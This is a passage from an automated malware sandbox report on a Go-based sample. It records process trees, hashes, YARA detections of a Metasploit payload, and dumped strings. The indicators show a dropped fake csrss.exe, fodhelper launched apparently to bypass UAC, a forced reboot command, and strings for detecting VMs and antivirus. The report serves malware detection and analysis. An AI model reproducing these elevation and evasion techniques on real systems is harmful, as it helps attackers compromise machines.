                                                                                                                          Imagebase:0x900000
                                                                                                                          File size:15360 bytes
                                                                                                                          MD5 hash:5C11B99E6D41403031CD946255E8A353
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: fodhelper.exe PID: 6016 Parent PID: 7140

                                                                                                                          General

                                                                                                                          Start time:01:57:33
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\System32\fodhelper.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Windows\system32\fodhelper.exe"
                                                                                                                          Imagebase:0x7ff7a9b10000
                                                                                                                          File size:46080 bytes
                                                                                                                          MD5 hash:1D1F9E564472A9698F1BE3F9FEB9864B
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: conhost.exe PID: 5108 Parent PID: 7104

                                                                                                                          General

                                                                                                                          Start time:01:57:34
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7f20f0000
                                                                                                                          File size:625664 bytes
                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: csrss.exe PID: 5360 Parent PID: 6016

                                                                                                                          General

                                                                                                                          Start time:01:57:35
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\rss\csrss.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\rss\csrss.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:4520488 bytes
                                                                                                                          MD5 hash:14C0D8425930CCEC0566B04864A05670
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000002A.00000002.376433226.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000002A.00000003.364603703.000000000638A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000002A.00000002.387983179.0000000005700000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: shutdown.exe PID: 5384 Parent PID: 3192

                                                                                                                          General

                                                                                                                          Start time:01:57:36
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\SysWOW64\shutdown.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:shutdown -r -t 5
                                                                                                                          Imagebase:0xf0000
                                                                                                                          File size:23552 bytes
                                                                                                                          MD5 hash:E2EB9CC0FE26E28406FB6F82F8E81B26
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: conhost.exe PID: 6932 Parent PID: 5384

                                                                                                                          General

                                                                                                                          Start time:01:57:37
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7f20f0000
                                                                                                                          File size:625664 bytes
                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: cmd.exe PID: 4400 Parent PID: 3016

                                                                                                                          General

                                                                                                                          Start time:01:57:37
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\Sysnative\cmd.exe /C fodhelper
                                                                                                                          Imagebase:0x7ff64bd60000
                                                                                                                          File size:273920 bytes
                                                                                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: conhost.exe PID: 3212 Parent PID: 4400

                                                                                                                          General

                                                                                                                          Start time:01:57:38
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7f20f0000
                                                                                                                          File size:625664 bytes
                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: fodhelper.exe PID: 2528 Parent PID: 4400

                                                                                                                          General

                                                                                                                          Start time:01:57:38
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\System32\fodhelper.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:fodhelper
                                                                                                                          Imagebase:0x7ff7a9b10000
                                                                                                                          File size:46080 bytes
                                                                                                                          MD5 hash:1D1F9E564472A9698F1BE3F9FEB9864B
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: fodhelper.exe PID: 3932 Parent PID: 4400

                                                                                                                          General

                                                                                                                          Start time:01:57:39
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\System32\fodhelper.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Windows\system32\fodhelper.exe"
                                                                                                                          Imagebase:0x7ff7a9b10000
                                                                                                                          File size:46080 bytes
                                                                                                                          MD5 hash:1D1F9E564472A9698F1BE3F9FEB9864B
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: csrss.exe PID: 916 Parent PID: 7108

                                                                                                                          General

                                                                                                                          Start time:01:57:40
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\rss\csrss.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Windows\rss\csrss.exe
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:4520488 bytes
                                                                                                                          MD5 hash:14C0D8425930CCEC0566B04864A05670
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000032.00000003.393407437.000000000638A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000032.00000002.398055163.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000032.00000002.402547208.0000000005700000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                          Chronological Activities

                                                                                                                          Disassembly

                                                                                                                          Code Analysis

                                                                                                                          Reset < >

                                                                                                                            Analysis Process: 4t4y4r89UZ.exe PID: 5272 Parent PID: 4856 4t4y4r89UZ.exeCOMMON

                                                                                                                            Executed Functions

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00428B10, Relevance: 7.6, Strings: 6, Instructions: 106COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • ,-./01456:;<=>?@BCLMNOPSZ["\, xrefs: 00428C50
                                                                                                                            • bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert, xrefs: 00428C95
                                                                                                                            • ", xrefs: 00428CF9
                                                                                                                            • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi, xrefs: 00428C26
                                                                                                                            • VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 00428CF0
                                                                                                                            • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428CBC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.291152945.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.292345282.00000000009F9000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000000.00000002.292620786.0000000000C51000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000000.00000002.292634106.0000000000C55000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000000.00000002.292678294.0000000000CA8000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000000.00000002.292682841.0000000000CB6000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000000.00000002.292702681.0000000000CB9000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000000.00000002.292779961.0000000000CBB000.00000040.00020000.sdmp Download File
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: "$,-./01456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi
                                                                                                                            • API String ID: 0-2405844374
                                                                                                                            • Opcode ID: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
                                                                                                                            • Instruction ID: 42ee82367b21563e109480012d6fe3560eb94324b5bc2d8460cea0574e50dfb9
                                                                                                                            • Opcode Fuzzy Hash: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
                                                                                                                            • Instruction Fuzzy Hash: E851F5B46097158FD340EF65D18575EBBE0BF88708F818A2EF48887352DB389948DB96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00434690, Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004347C4
                                                                                                                            • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau, xrefs: 00434756
                                                                                                                            • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br, xrefs: 00434852
                                                                                                                            • m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA, xrefs: 00434778
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.291152945.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.292345282.00000000009F9000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000000.00000002.292620786.0000000000C51000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000000.00000002.292634106.0000000000C55000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000000.00000002.292678294.0000000000CA8000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000000.00000002.292682841.0000000000CB6000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000000.00000002.292702681.0000000000CB9000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000000.00000002.292779961.0000000000CBB000.00000040.00020000.sdmp Download File
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
                                                                                                                            • API String ID: 0-626581767
                                                                                                                            • Opcode ID: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
                                                                                                                            • Instruction ID: 8241637a7f35ac624855d2df19fea6a5ed42779f520a2a5d8b1c8658a748f46b
                                                                                                                            • Opcode Fuzzy Hash: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
                                                                                                                            • Instruction Fuzzy Hash: 4551C7B4608705CFD344EF65D18575EBBE0BF88308F41886EE48887312D7799885CF9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Analysis Process: 4t4y4r89UZ.exe PID: 5300 Parent PID: 5272 4t4y4r89UZ.exeCOMMON

                                                                                                                            Executed Functions

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00428B10, Relevance: 7.6, Strings: 6, Instructions: 106COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi, xrefs: 00428C26
                                                                                                                            • ,-./01456:;<=>?@BCLMNOPSZ["\, xrefs: 00428C50
                                                                                                                            • ", xrefs: 00428CF9
                                                                                                                            • VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 00428CF0
                                                                                                                            • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428CBC
                                                                                                                            • bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert, xrefs: 00428C95
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.319354996.00000000009F9000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 0000000A.00000002.319396827.0000000000A59000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 0000000A.00000002.319628240.0000000000C51000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 0000000A.00000002.319633855.0000000000C55000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 0000000A.00000002.319666685.0000000000CA8000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 0000000A.00000002.319672355.0000000000CB6000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 0000000A.00000002.319676873.0000000000CB9000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 0000000A.00000002.319681977.0000000000CBB000.00000040.00020000.sdmp Download File
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: "$,-./01456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi
                                                                                                                            • API String ID: 0-2405844374
                                                                                                                            • Opcode ID: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
                                                                                                                            • Instruction ID: 42ee82367b21563e109480012d6fe3560eb94324b5bc2d8460cea0574e50dfb9
                                                                                                                            • Opcode Fuzzy Hash: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
                                                                                                                            • Instruction Fuzzy Hash: E851F5B46097158FD340EF65D18575EBBE0BF88708F818A2EF48887352DB389948DB96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00434690, Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau, xrefs: 00434756
                                                                                                                            • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004347C4
                                                                                                                            • m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA, xrefs: 00434778
                                                                                                                            • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br, xrefs: 00434852
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.319354996.00000000009F9000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 0000000A.00000002.319396827.0000000000A59000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 0000000A.00000002.319628240.0000000000C51000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 0000000A.00000002.319633855.0000000000C55000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 0000000A.00000002.319666685.0000000000CA8000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 0000000A.00000002.319672355.0000000000CB6000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 0000000A.00000002.319676873.0000000000CB9000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 0000000A.00000002.319681977.0000000000CBB000.00000040.00020000.sdmp Download File
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
                                                                                                                            • API String ID: 0-626581767
                                                                                                                            • Opcode ID: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
                                                                                                                            • Instruction ID: 8241637a7f35ac624855d2df19fea6a5ed42779f520a2a5d8b1c8658a748f46b
                                                                                                                            • Opcode Fuzzy Hash: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
                                                                                                                            • Instruction Fuzzy Hash: 4551C7B4608705CFD344EF65D18575EBBE0BF88308F41886EE48887312D7799885CF9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Analysis Process: csrss.exe PID: 3192 Parent PID: 5300 csrss.exeCOMMON

                                                                                                                            Executed Functions

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00428B10, Relevance: 7.6, Strings: 6, Instructions: 106COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi, xrefs: 00428C26
                                                                                                                            • ", xrefs: 00428CF9
                                                                                                                            • VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 00428CF0
                                                                                                                            • ,-./01456:;<=>?@BCLMNOPSZ["\, xrefs: 00428C50
                                                                                                                            • bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert, xrefs: 00428C95
                                                                                                                            • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428CBC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.551547677.00000000009F9000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 0000000E.00000002.551800519.0000000000C51000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 0000000E.00000002.551813836.0000000000C55000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 0000000E.00000002.551871924.0000000000CA8000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 0000000E.00000002.551888084.0000000000CB6000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 0000000E.00000002.551901407.0000000000CB9000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 0000000E.00000002.551911673.0000000000CBB000.00000040.00020000.sdmp Download File
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: "$,-./01456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi
                                                                                                                            • API String ID: 0-2405844374
                                                                                                                            • Opcode ID: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
                                                                                                                            • Instruction ID: 42ee82367b21563e109480012d6fe3560eb94324b5bc2d8460cea0574e50dfb9
                                                                                                                            • Opcode Fuzzy Hash: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
                                                                                                                            • Instruction Fuzzy Hash: E851F5B46097158FD340EF65D18575EBBE0BF88708F818A2EF48887352DB389948DB96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00434690, Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau, xrefs: 00434756
